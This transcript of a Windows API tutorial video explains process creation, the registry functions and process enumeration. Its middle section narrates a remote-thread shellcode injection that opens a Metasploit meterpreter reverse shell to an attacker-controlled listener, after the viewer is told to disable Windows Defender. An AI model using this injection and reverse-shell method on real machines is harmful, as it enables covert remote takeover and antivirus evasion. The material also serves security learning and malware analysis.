Have you ever launched an app? I mean, sure you did, you are watching this video on a web browser, but what if you want to do it programmatically inside a C code, let's say? Well, it's not as easy as clicking an icon. In fact, creating a new process is a fairly complicated task. Your system needs to perform a bunch of checks and quite sophisticated operations, just so you can add 2 plus 2 together. Thankfully, Windows provides easy-to-use functions so that all this job is shortened to just writing CreateProcess and adding some parameters. As you might expect, there is way more stuff you can do, and in today's video I'm gonna show you 10 functions that everyone should know, especially if you are doing malware analysis or development. First we want to declare 2 structures, startup info, SI, and process information, PI. Let's fill the memories of those structures with zeros, like this. Size of SI, and the same for PI. I forgot a semicolon here. PI. And also we want the size of startup structure, CB member, si.cb, or maybe not the startup structure, but the second member. Okay, so CB we want to be equal to size of SI. By the way, a very cool tip: if you in Visual Studio, if you hold Control and left click on those green functions, and in general on Windows API functions, if you left click on it, you will be brought to these files with to the file with definitions, so you can see what all these structures are doing. There are some simple comments on them. So yeah, for example, you can see these are all the members of startup infrastructure. Okay, but back to our code. Now we can, wait, let's delete this. Now we can call the actual create process A structure. A is for ANSI. You can also have the create process W for white char. That's just a specification of what type of string it can get from your input. So in case of A, we'll pass ANSI strings. So let's start with first parameters, first 2 parameters, because they can be pretty confusing. First one is LP attribute name, if I'm correct. Wait, let me quickly double check the naming. Sorry, application name, and the second one is LP command line. So they can be confusing because they can be used to do the same thing, which means if I type C Windows system32 calc.exe here and null here, and this function will create a process with a calculator running, right? But if I do this, null here, and the path to calculator here, it will do the same. The difference is that here we are searching for the calculator by its name, and here we are executing a command line. So again, another difference is that here we can pass some parameters to this the function, to this application, and here we cannot. So be aware of this, and that's why I pretty much always use the second parameter to calling for creating a process. All right, so third parameter, LP process attributes. It specifies whether a child process of the process that we are creating, that might be spawned, because you never know, that might be spawned, can inherit handle to this process. Now you might immediately ask, what is a handle if you are a beginner in Windows API? So a handle to an object is just a pointer that allows us to modify and work with this object, basically. So once we, for example, if we use a function that creates a file, it returns a handle to this file. And thanks to this handle, we can then write to the file, modify the permissions of this file, for example, we can delete the file, and all this stuff. So if we can specify here if it can inherit the handle or not. If we type null, it won't. Here is LP thread attributes, same analogy but with threads. So we can pass null. BL inherit handles, again the third parameter, which lets us specify inheritance settings, but this time we are specifying if this process can inherit handles from the calling process, which is from our application. And we pass false here. Next parameter you can see on the screen for some reason, so let me look it up here. DW creation flags. Now, what are those? You can go down the documentation and you will find this link here. And if you go to this website, you will see a list of flags or options, basically, for how the process will be created. So, for example, you can add a flag create no window. And then if you have a console application, for example, that just does its job, it doesn't require any user interaction, so you might not want to have a graphical user interface, you can pass this create no window flag and there will be no window, basically. And there are a bunch of other options, so yeah, you're welcome to check and research them, see what they do, but I will just pass 0 here. Next is LP environment, if I'm correct. Am I correct? LP environment. Yeah, so LP environment is a pointer to the environment block for the new process. And this environment block is a bunch of variables, structures like this, name, value, with a null terminated null byte at the end. So those are just environment variables for this process. But we aren't using them. So as you can see, you can pass null here. Null. And last two parameters which we are using. First one from the group of last ones is the address of startup infrastructure, and the totally last one is the address of process information structure. So you can, or maybe not. Wait, maybe I'm missing something. LP environment, then, oh wait, one more thing. LP current directory, the full path to the current directory for the process. The string can, okay, if the process is null, the new process will have the same current drive and directory as the calling process. Alright, so we can pass null here. I forgot about it. And now we should be good to go. Are we? Yeah. So watch me start this function, and I believe this should be uppercase. And if we run it, hopefully we will see calculator spawning somewhere. Yeah. As you can see, we have a new process running. If you go to process hacker, you can search for calc, and you can see calculator app.exe. It has its own PID. It has everything. So yeah, basically that's how you use CreateProcess. OpenProcess by itself isn't a very visually good looking function. I mean, you won't see any crazy stuff going on just by calling it, as with CreateProcess. But it is essential for working with processes further on. So let's make a simple program that will allow us to open a process by passing its ID. So first let's go with this printf. First let's initialize process ID variable. Process ID equals null, like this. Printf give process ID. All right. Now let's use scanf to read user input. Scanf. We will do it like this and address to process ID. All right, and actually we need to do one more thing. We need to define crt security no warnings flag, because scanf is memory unsafe. So we need to define this so that Visual Studio won't throw any errors. And now let's call the OpenProcess function. And the OpenProcess function returns something what's called a handle. Wait, not create, OpenProcess. All right, so it returns something which is called a handle. And what's a handle? A handle is a thing that allows you to interact with another thing. So basically, if you have a file and you have a handle to this file, using this handle, you can modify this file, write, change it, and do all this stuff. And using the handle to a process, you can also work on this process, sort of. So this handle is a thing that allows you to work with the thing that it points to. I hope it's quite clear what a handle is. So let's start with the first parameter of OpenProcess, which is desired access. And I'm gonna go with process all access here. Wait, process all access. It should be like this. And process all access gives me all access to the process. I can do anything. I can write to it, I can read from it, I can change it however I want. I'm gonna show you more those flags in a second, but let's complete this little program. Second parameter is this boolean that we are already familiar with, inherit handle. Let's pass false here. And the second is dword dw process ID. So of course, process ID. And let me create a simple if statement that will check if our handle, if we got the handle. So if handle is null, let's printf error opening process, and let's print get last error. This is the function that will return an error code. Actually, this is the function that will return an error code of the last error that occurred, and you can then Google this error and debug further what it says. So this is a very handy thing, and also we want to finish the program here if it doesn't work. So return 1. And if it does work, let's printf successfully opened process with ID %d with ID process ID, like this. Sure. So let me open a calculator for tests, and let's open process hacker to check out the ID. Type calc here. As you can see, calculator app it has an ID of 23828. 23828. So if we run our little app, okay, it has an error somewhere. CRT secure no warnings, but I declared it. Warnings. Maybe I have some typo here. CRT security. Oh wait, secure. No, not security. Secure no warnings. My mistake. So let's run it again. And I forgot the process ID. 23828. 23828. Successfully opened process with ID 23828. And now we have this handle to a process, and we can do something with calculator. Now let me show you where you can see more of these flags. And as you might have guessed, the one and only place is the documentation. So if you go to OpenProcess function page, go to parameters, you will see this link to process access rights. And here in process access rights, you have a bunch of values that you can specify. For example, the process all access, all possible access rights for process object. So you can do everything. And yeah, you can specify more strict rules if you want. So definitely go check it out, experiment, and see you in the next function. Once we get a handle to a process with OpenProcess function, we want to, for example, allocate some memory to it. So we can do it with VirtualAlloc function, and this is important, with a suffix ex, because this is an external process. We don't want to allocate memory inside the process that our code runs in, but in the process that we open, so VirtualAllocEx. Now, as for the parameters, first one is handle to the process, second one is the address where we want to allocate this memory. Now, if you pass null here, it will be determined automatically, and that's what we want to do. Third parameter is the size of the memory that we want to allocate. Let me type size of buff, and I will create a buff. I will create this buffer later. Now, fourth parameter is allocation type. There are a couple allocation types actually. You can see it in the documentation. We have FL allocation type, right? The type of memory allocation, this parameter must contain one of the following values. And the most common one used is the memCommit and memReserve, this combination of those two. What do they do? Well, memReserves reserves, as you probably guessed, reserves a segment in memory, and memCommit actually does the commits the data to the reserved space, sort of. So that's like a very simple explanation of it. And of course you have more. I don't want to go through every one of those. You can do it by yourself, I'm sure, but you have like a ground understanding of this parameter. So let's go with memCommit and memReserve. Alright, and the last is FLProtect. FLProtect allows you to specify what can and cannot be done with this memory region. So let me explain. If you type page read write, only thing you will be able to do is to read from this memory or write to it. If you type page read write execute, or more like page execute read write, page execute read write, we'll be able to execute this memory as a code and read from it and write to it. And there are mixes of those parameters, of course. Yeah, page read write, page execute read write, but you can page read only, write only, and all of this stuff. Typically, what you would do is page read write only without execute. And why is that? Because certain versions of Windows don't allow allocating an executable memory. So if you want to execute the memory or execute the code in this memory that we put here, this buffer that we will create in a second, we need to change the protection of allocated memory after its allocation, and we do it with the next function. And one more thing is that VirtualAllocEx returns a pointer to the location where the memory was allocated, and the pointer is of type LP void, like this. And let's call it P for pointer buffer location, like this. And let's say that if P buffer location is equals to null, we print this error message. Error allocating memory inside the process. All right. Now, once we have allocated some memory, we should probably write something to it, right? So I want to do it as cool and as visual as possible. So I decided to go with reverse TCP shellcode, because why not? We're gonna write a very simple shellcode injection script and based off the script, you will probably understand how all these functions work quite well. All right, so you can copy paste it here like this, and let's use WriteProcessMemory function. WriteProcessMemory. This is a bool function, as you can see. So let's wrap it up inside an if statement like this. So if this fails, we will print an error. But if it doesn't fail, we will move forward. So first parameter is handle to a process that we want to write to. Second parameter is the base address, and we want to start from here. Here is the address of memory that we allocated, of the beginning of this memory. Third parameter is the buffer that we want to write, so it's buff, this one. Fourth is the size of the buffer, I believe. Yes, so size of buff. And the fourth one is the address of variable that will contain the size of memory that we that binds to it will contain the amount of bytes that we wrote to this memory. So let's quickly int declare this variable like this. Let's make it null, and address to bytes written. So as you saw, it displayed size t variable of type of size t. If you type size t var, let's test it. Size t var. This is a definition that is just size t is just an unsigned integer. Yeah, so actually you can check out all of this by clicking left control and left click on it. You will be brought to this script that shows you. As you can see, this LP void is just a void pointer, for example, or a handle is also a void pointer. All right, so if this fails, let's print error writing to memory inside this process, and we are good to go. The almost last thing we need to do is to change the protection, because we have this shellcode inside our process, but we can't really do anything with it. We can read, we can write, as you can see, but we can't execute. So you do it with VirtualProtectEx. And VirtualProtectEx, very simple function. Wrap it up inside an if statement, because it also returns a boolean value. VirtualProtectEx. First parameter it takes is a handle to a process, of course. Second parameter, LP address, here, like this. Fourth parameter, DW size of buff. Fifth parameter, new protect. Let's copy this here and change it to execute, read write. And the pointer to a variable that will hold the old protection. So you do it like this: dword old protect equals null, and here you pass the address of old protect like this, and the if statement, and let's print the error changing protection of memory, like this. All right, so to summarize what we have done so far, we used OpenProcess to open the target process. We used VirtualAllocEx to allocate memory in a remote process, in the process that we opened. We used WriteProcessMemory to write to this memory that we allocated, and we used VirtualProtectEx to make this code inside the memory executable. So the only thing that is left is to actually execute this code. And we execute it by creating a new thread for it with create CreateRemoteThread function. Now, this function returns a handle to this thread, so let's initialize it already. Handle hThread equals CreateRemoteThread. And the first parameter is a handle to the process in which we want this thread to run. So this is our hProcess. LPThread attributes. LPThread attributes this parameter. This parameter refers to the security attribute structure. It basically does all this stuff with inheriting handles that I explained before. We don't need that. Pass null here as the documentation says. So null. Third parameter is the DW stack size. I don't really want to explain here what stack is. You can Google it or search for it on YouTube. There is plenty videos about it. But basically, we can specify here how large the stack should be, or we can type 0 to make it a default size for an executable file, which we want to do. Start routine, lthread start routine, lp start address, which is a pointer to buffer location. Then lp parameter, if this function that runs here, if this were to have any parameters, we could specify them here. It doesn't, so type null. DW creation flag. There are a couple ways or maybe states that you can create a thread in. A thread can be suspended and then resumed further in your code so that it doesn't need to execute our code immediately after creation. If you pass here create suspended, right? But we want to execute this code immediately, so let's pass value 0. And the LP thread ID, this parameter is for the address of, for the ID of thread that we just created. So actually we can create a simple dword thread ID variable. Let's pass null here. And we can pass an address to thread ID like this. Now, semicolon here. If hthread is null, let's print error creating thread like this. And if everything worked, we should print I don't know, it works, thread ID is %d, and let's print this thread ID here. Wait, thread ID, I can type thread ID, all right, like this. So that's it for this simple program. As you can see, we have used 1, 2, 3, 4, 5 functions. I'm not counting these getLastError, but let's test it. To catch our reverse shell, we need to use Metasploit. So launch MSF console with this simple command. You need to wait a little bit, and once it's working, type use multi-handler. Type options. As you can see, we need to set payload first. Payload is Windows x64 meterpreter reverse TCP. Like this. Set lhost, which is IP of Kali machine 168.1.0.130. Clear options, and set exit func to thread. Okay, so we can type run. Make sure you have Windows Defender turned off. Manage settings, runtime protection off. Okay, and go back to Visual Studio and click run. Give process ID. So let's open calculator and process hacker again. Okay, the calculator process ID is 32060. So 32060, enter. We got some stack error, stack related error. But overall, we have successfully opened process ID and it works with this thread. So let's check out the MSF console, and sure enough, we can type shell, who am I, and we have completely took over the machine, basically. So I hope now you understand how those functions work based on this example, and let's move on with the next one. Before jumping into the next functions, let me quickly tell you what is Windows Registry. And in the simplest terms, it's just a database of configurations and settings for your system and applications to run. For example, there is a register that specifies which applications should be launched at startup. It's also important to mention that registry keys are extremely sensitive, and deleting the wrong key can result in completely messing up your system, so be careful what you do with it. In order to create a registry key, you just need to use the function RegCreateKeyEx, and this function returns a long variable that we can call status that will hold status, basically, and it will tell us if we successfully created the registry key or not. First parameter, you need to pass here a handle to one of 5 root keys, which are, for example, H key current user. As you can see, there are a couple of those. Current user is the one that we will use, and why is that? If you go to registry editor, you can see that, you can see that we have 5 main registry keys, which are also called hives, and each of them contains a bunch of subkeys, and those subkeys contain another subkeys, and it works basically like this. And by the names, you can already tell that each root key, or each hive, as it's also called, contains subkeys that are for specific uses. For example, HKey users contains information about each user on the system. All right, so we want HKey current user. The second parameter is a subkey. We want our subkey to be created under software, and we want to call it my key, like this. I don't want to show more in registry editor because I am afraid I will leak something, but open it up by yourself and you will see this directory. All right, third parameter is reserved. This is a sketchy one because the only thing that there is about it on the official documentation, is that you need to pass 0 here. So I will do it, but I don't know why we need 0 here. But they don't say for some reason. So yeah, fourth parameter, LP class. This is also optional parameter. They say that in most cases you will pass null here, or if you want to classify your registers, if you create a lot of them and you want these, like, I don't know, 5 registers to be classified as registers for something and other 5 to be for something else, you can pass this class here, but this is completely optional. Now DW options, you have couple options that you can create registers with. Let me show you those 4. For example, reg option non-volatile makes your registry key don't disappear after rebooting, if that makes sense. So basically it persists, and reg option volatile makes registry disappear after rebooting. You also have a reg option create link and reg option backup restore, but we won't use them, so let's just go with reg option non-volatile. the regsum sum desired, you just pass key all access, security attributes, the same stuff as before with inheritance, and pointer to a handle that we want, because we want to have a handle to the newly created key, of course, so we are able to modify it, read and write from it. So let's create a handle very fast and pass address to this handle here, and this position, which is another variable that we need to create of type dword, this position like this, and you need to pass its address here. And why is that? Because the RegCreateKeyEx function can both create a registry key, and if there is a registry key of this name that already exists, it will open it. And to the disposition variable will be, and in the disposition variable, there will be a value saved. Whether if you created new registry, it will hold this value, and if you open the existing registry key, the disposition variable will hold this value. So that's why we need it. And if everything went well, we can check it by comparing status to exit success. Wait, not exit success, error success. If everything went right, we want to do something here, like this. So let's set a value to our newly created key. We do it with RegSetValue. It also returns a status, so let me just type long set status maybe equals this. Let's also first declare a variable dword key, or no, dword value equals 1, 2, 3, 4, like this. Now, first parameter hKey, handle to newly created key. Second parameter LP value name, which is gonna be a name of our value. Let's call it my value. Then reserved, again 0. The W type is gonna be reg dword. Now byte LP data address of this, and we need to typecast it to byte pointer. Address value, like this. And the last one is CB data, so just size of dword. If you don't know what dword is, you can always control left click, and you can see that it's just unsigned long, which is basically a 32-bit value, if I'm correct. Can I check it? Yeah, 4 bytes, 32 bits, right? Okay, so semicolon at the end. Let's check if set status is indeed, if it indeed succeeded. So error success. It's always very confusing to me that we call it error success, not just success. If we succeeded, that there is no error. But yeah, that's the naming convention, so we can't do anything about it. So let's print something here, like successfully set value to registry. All right, and yeah, that's it. So now we can save and click run. And if you do so, you won't see this. You won't see it for some reason. And why is that? Let me quickly think about something. Let me check actually in registry editor if we have this. So if you go to current users, software, we should have something like my key. Yes, there is a my key, and there is a 1, 2, 3, 4 value. So why there is no print? Okay, rookie mistake. again, let's not call it a mistake, let's call it a typo. So now if you run it, successfully set value to registry, you always have to have double equal sign here. All right, so that's how you create a registry and set a value. But what if you want to open an existing registry and read a value from it? Let's start by commenting out this part. We don't need it anymore. And we write long status equals RegOpenKeyEx function like this. First parameter is gonna be our handle, because we need to specify the location of the key that we want to open, of course. So we do it like this. Third parameter, this says basically if we want to open a link or a register itself, registry key itself. So we type 0 for registry key, and for a link we type, let me show you. For a link we type this, reg option open link, all right? But we want to specify 0 here because we don't have a link, we have a registry itself. Some desired, it is gonna be key read, like this, and ph key result, it is gonna of h key, like this. Semicolon, if status equals error success, we want to now read this value. So for this, we want to first declare some variables. First one is gonna be dword size equals size of a dword, because as you remember, our size of our variable is a dword here, so it's of a size dword, right? And for now, let's leave it like this. Long query status, or status query. Okay, it equals to RegQueryValueEx. First parameter is a handle to the key, so it's gonna be hkey. Second parameter, value name, which is my value. Third parameter is reserved, so 0 as you remember. L type, this is key dword, if I remember, dword, like this, or just a dword. Wait, no, sorry. This is an address of a variable that will return a parameter code. Okay, I forgot. Dword type. Okay, let's call it dword type, and we want to specify address of type here. LP data. This is the parameter that will hold the value that we read. So the word value like this, and you need to typecast it to byte pointer like this. Address value, and the last one is the address a pointer to a variable that will tell the size, sort of, right? So we do it like this, and if it succeeds, so status query equals error success, we want to printf the value is %d value. Okay, so that's it. It should work already. So let me run and test it. And as you can see, we have 1, 2, 3, 4. So everything is working perfectly fine. So yeah, with those 4 functions, you can do pretty much all the basic stuff you want to do with registry. Of course, there are more, and I encourage you to explore them. But yeah, that's it for the registry-oriented functions in this video. The last function is EnumProcesses, which allows us to get all the IDs of processes running on the system. And to be able to call it, make sure you include ps API .h header file here. And let's go with if EnumProcesses, because we want to do something if it succeeds. Open brackets. And first parameter is a pointer to the start of an array. So let's quickly declare an array. The word processes. Let's make it 1024, just for an example. Now processes here. Second parameter, size of processes, like this. And the third parameter will return a number of bytes that we wrote to this array. So let's quickly make cb bytes needed. How was it called? Wait, it was called it doesn't display. Let's say I don't know, return bytes or something like this, whatever, and address to this variable return bytes, like this. And if it succeeds, okay, if it doesn't succeed, let's do it this way. Let's printf error enumerating processes. Okay, and return 1. And if we get the if it succeeds, let's quickly create another variable called processes count. Okay. Now processes count is gonna be equal. Processes count is gonna be equal to return bytes divided by size of the word, because each entry in this, each element in this array is the size of the word, and if we get all the memory that we saved in this array and divide it by the size of bytes, we basically get the amount of elements. All right, so why do I have an error here? Expected what? Okay, I know. Right, so now what we can do is to, for example, print all of those IDs. So let's create a for loop. Int I equals 0, I is less than processes count, and I++. Process printf found process with ID %d process processes with index I, like this, and we are good to go, I believe. So let's compile it and run, and you can see that. Wait, actually let's put this next line sign, and now you can see that we have a list of IDs of all the processes running. So that's how you do it. And if you ask me why do you need it, well, for example, let's think about a scenario when you have a name of a process and you need its ID. So what you can do is that you can enumerate, call this function, enumerate all the processes. You get the list of IDs, then you open each process. You use some other function that will get you its name, and you can compare the name of the process that you are looking for with the name of the process that you got, and it will return you the name of the ID of the process that you are looking for. It comes very handy while doing stuff on remote processes when you have limited information, that you only know that this process is running and nothing more. Then you can use this approach. And that's all I prepared for this video, so thank you for watching, and if you have any questions or feedback in general, make sure to leave it in the comments below. Also, like and subscribe so you don't miss any new content, and see you soon!